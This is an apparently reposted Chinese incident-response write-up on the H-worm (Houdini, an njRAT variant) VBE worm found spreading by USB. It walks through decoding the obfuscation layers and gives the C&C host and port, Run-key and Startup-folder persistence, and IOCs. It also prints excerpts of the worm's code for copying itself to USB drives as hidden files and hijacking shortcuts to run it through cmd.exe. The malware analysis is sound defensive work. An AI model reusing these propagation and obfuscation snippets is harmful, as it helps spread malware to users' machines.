文章总结： 文档分析了通过USB传播的H-wormhoudini蠕虫病毒。作者通过解密VBE脚本识别出该恶意软件为NJRAT变种，解析了其C&C配置、注册表持久化机制及通过劫持快捷方式传播的原理。文章提供了事件归因、加固建议及关键IOCs。 综合评分： 82 文章分类： 恶意软件,逆向分析,应急响应,威胁情报

H-worm_houdini蠕虫病毒

原创

kelvin kelvin

Mimi is Cat

2026年1月22日 08:19 广东

事件经过

发现恶意VBE感染排查日志发现是USB感染

查看vbe已加密但是从开头< Safa7_22 >可以判断出是H-worm_houdini

知道了他是谁了就解密看看，使用scrdec18-VC8.exe

（https://gist.github.com/bcse/1834878/archive/7483fb72abbb32aa69b853fdcc9f6f72e7568677.zip）进行解密

解开第一层加密得到decode.vbs，发现还有一层加密

‘< Safa7_22 >

iLol = “72+39+39+79+39+39….”

iLol = SPLIT(iLol,”+39+39+”)

FOR X = 0 TO UBOUND(iLol) -1

Xman = Xman & ChrW(iLol(X))

NEXT

EXECUTE (Xman)

继续解密得到

HOUDINI = “39|60|91|32|114|101|99|111|100…

|13|10|101|110|100|32|102|117|110|99|116|105|111|110|”

HOUDINI = SPLIT(HOUDINI,”|”)

FOR I = 0 TO UBOUND(HOUDINI) -1

NJ = NJ & CHR(HOUDINI(I))

NEXT

EXECUTE (NJ)

可以看到NJ函数和HOUDINI，这些信息是关联作者和程序来源，通过一些情报文章可以得知这是一个2013年的古老蠕虫远控，HOUDINI是作者的论坛ID，H-worm是NJRAT的一个变种版本

https://fireeye.com/blog/threat-research/2013/09/how-you-see-me-h-worm-by-Houdini.html

https://www.zscaler.com/blogs/security-research/njrat-h-worm-variant-infections-continue-rise

再继续解密得到可读脚本

配置模块

host = “herohero.no-ip.org”    C&C服务器地址

port = 96                    通信端口

installdir = “%temp%”        安装目录变量

lnkfile = true               启用文件快捷方式感染

lnkfolder=true      启用文件夹快捷方式感染

初始化与持久化模块

通过以下位置进行初始化和持久化蠕虫

HKEY_CURRENT_USER\software\microsoft\windows\currentversion\run\

HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\run\

C:\Users\***\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\

主控制模块

实现文件上传下载、更新、卸载、删除、枚举目录、执行、cmd、cmd-shell

U盘检测与感染

木马本体传播

复制自身：将当前脚本复制到U盘根目录

属性隐藏：设置2（隐藏）+ 4（系统文件）属性，默认不可见

filesystemobj.copyfile wscript.scriptfullname , drive.path & “\” & installname,true

filesystemobj.getfile(drive.path & “\” & installname).attributes = 2+4

lnk劫持

for each file in filesystemobj.getfolder(drive.path & “\”).Files

if not lnkfile then exit for  ‘配置开关控制

if lcase(split(file.name, “.”)(ubound(…))) <> “lnk” then  ‘跳过已感染的lnk

file.attributes = 2+4  ‘隐藏原文件

set lnkobj = shellobj.createshortcut(drive.path & “\” & filename(0) & “.lnk”)  ‘创建同名lnk

lnkobj.targetpath = “cmd.exe”

lnkobj.arguments = “/c start ” & installname & “&start ” & file.name & “&exit”  ‘执行蠕虫

最后看看感染并不多

事件归因

用户使用感染蠕虫的U盘导致系统感染H-WORM蠕虫。

加固

1、 禁用USB

2、 使用移动存储设备时先查杀病毒

IOCs

herohero.no-ip.org

tlktkovwwq..vbe

SHA1： 709f12767512de668c02b9797e58840d366d8acb

免责声明：

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景，旨在提升网络安全防护能力，具有明确的技术研究属性。

任何单位或个人未经授权，将本文内容用于攻击、破坏等非法用途的，由此引发的全部法律责任、民事赔偿及连带责任，均由行为人独立承担，本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布，若存在版权侵权或其他异议，请通过邮件联系处理，具体联系方式可点击页面上方的联系我。

本文转载自：Mimi is Cat kelvin kelvin《H-worm_houdini蠕虫病毒》